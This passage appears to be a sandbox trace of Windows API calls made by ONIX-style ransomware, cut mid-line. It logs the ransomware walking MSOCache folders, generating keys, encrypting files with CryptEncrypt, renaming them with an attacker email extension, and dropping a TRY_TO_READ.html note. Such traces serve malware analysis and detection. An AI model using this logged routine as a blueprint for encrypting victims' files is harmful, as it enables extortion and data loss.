Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.711] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=868864) returned 1 [0104.711] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd4200 [0104.711] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.711] GetProcessHeap () returned 0x410000 [0104.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.711] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.711] WriteFile (in: hFile=0x48c, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.715] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.717] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 0x2680020 [0104.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 0x2b30020 [0104.718] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.718] ReadFile (in: hFile=0x48c, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd4200, lpOverlapped=0x0) returned 1 [0104.754] UnlockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd4200, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.754] CloseHandle (hObject=0x48c) returned 1 [0104.755] GetProcessHeap () returned 0x410000 [0104.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.755] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.757] GetProcessHeap () returned 0x410000 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0104.757] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.757] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.757] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.757] GetLastError () returned 0x0 [0104.757] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x48c [0104.758] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.758] LockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x333, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.758] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.758] ReadFile (in: hFile=0x48c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.759] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.759] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.759] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.760] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.760] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", dwFileAttributes=0x80) returned 1 [0104.760] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 80 [0104.760] GetProcessHeap () returned 0x410000 [0104.760] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0104.760] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" [0104.760] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.760] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=819) returned 1 [0104.760] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x333 [0104.760] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.760] GetProcessHeap () returned 0x410000 [0104.760] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.760] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.760] WriteFile (in: hFile=0x48c, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.761] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.762] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.763] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x333) returned 0x46a0f0 [0104.763] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x333) returned 0x4d8b68 [0104.763] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.763] ReadFile (in: hFile=0x48c, lpBuffer=0x46a0f0, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesRead=0x367f44c*=0x333, lpOverlapped=0x0) returned 1 [0104.763] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.764] WriteFile (in: hFile=0x48c, lpBuffer=0x4d8b68*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesWritten=0x367f44c*=0x333, lpOverlapped=0x0) returned 1 [0104.765] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a0f0 | out: hHeap=0x410000) returned 1 [0104.765] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.765] UnlockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x333, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.765] CloseHandle (hObject=0x48c) returned 1 [0104.766] GetProcessHeap () returned 0x410000 [0104.766] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.766] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.768] GetProcessHeap () returned 0x410000 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0104.768] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.768] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.768] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.768] GetLastError () returned 0x0 [0104.768] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x48c [0104.768] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.768] LockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa40, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.768] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.768] ReadFile (in: hFile=0x48c, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.770] SetFilePointerEx (in: hFile=0x48c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.770] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.770] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.770] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.770] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0104.770] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0104.770] GetProcessHeap () returned 0x410000 [0104.770] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0104.770] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0104.770] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.770] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2624) returned 1 [0104.771] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xa40 [0104.771] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.771] GetProcessHeap () returned 0x410000 [0104.771] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.771] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.771] WriteFile (in: hFile=0x48c, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.774] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.775] WriteFile (in: hFile=0x48c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.778] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa40) returned 0x4d8b68 [0104.778] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa40) returned 0x4d95b0 [0104.778] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.778] ReadFile (in: hFile=0x48c, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0xa40, lpOverlapped=0x0) returned 1 [0104.779] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-2624, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.779] WriteFile (in: hFile=0x48c, lpBuffer=0x4d95b0*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d95b0*, lpNumberOfBytesWritten=0x367f44c*=0xa40, lpOverlapped=0x0) returned 1 [0104.780] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.780] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d95b0 | out: hHeap=0x410000) returned 1 [0104.780] UnlockFile (hFile=0x48c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa40, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.780] CloseHandle (hObject=0x48c) returned 1 [0104.780] GetProcessHeap () returned 0x410000 [0104.780] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.780] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.782] GetProcessHeap () returned 0x410000 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0104.782] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.782] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.782] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458968 [0104.782] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.782] GetLastError () returned 0x0 [0104.782] FindNextFileW (in: hFindFile=0x48ec30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c684f0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0104.783] CloseHandle (hObject=0x3cc) returned 1 [0104.783] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.783] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x2c, wMilliseconds=0x9f)) [0104.783] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0104.783] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0104.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0104.783] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0104.783] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0104.784] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.784] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4589f0 | out: hHeap=0x410000) returned 1 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f6f8 | out: hHeap=0x410000) returned 1 [0104.784] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ec70 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.784] GetLastError () returned 0x0 [0104.784] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c684f0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c684f0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.784] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.785] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0104.785] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 